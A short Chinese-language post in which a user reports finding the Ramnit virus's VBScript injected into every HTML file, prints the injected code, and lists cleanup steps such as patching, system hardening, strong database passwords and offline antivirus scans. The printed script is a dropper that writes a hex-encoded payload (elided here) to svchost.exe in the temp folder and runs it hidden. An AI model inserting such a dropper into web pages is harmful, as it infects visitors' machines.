ramnit病毒

今天打开Hbuilder，发现每个html文档都有如下代码：

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData =4B3F9................................................................0FAB3F-------无数个十六进制字符

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

//--></SCRIPT>

网上搜索是电脑中的ramnit病毒

此类病毒是感染类病毒，要先断源，防止反复感染，然后清理查杀才有效

1.使用漏洞修复扫描，并安装所有的高危漏洞补丁

2.使用安全卫士--功能大全---系统防黑加固扫描，解决系统薄弱项，防止因为弱口令问题导致反复感染

3.如果有安装oracle，my SQL之类的数据库软件，请将登录口令设置在16位以上，要包含大小写，数字和特殊字符，理由同上

4.下载安装最新版的360杀毒，并在断网情况下进行下全盘扫描扫描完毕后重启，然后再次全盘扫描，即可解决问题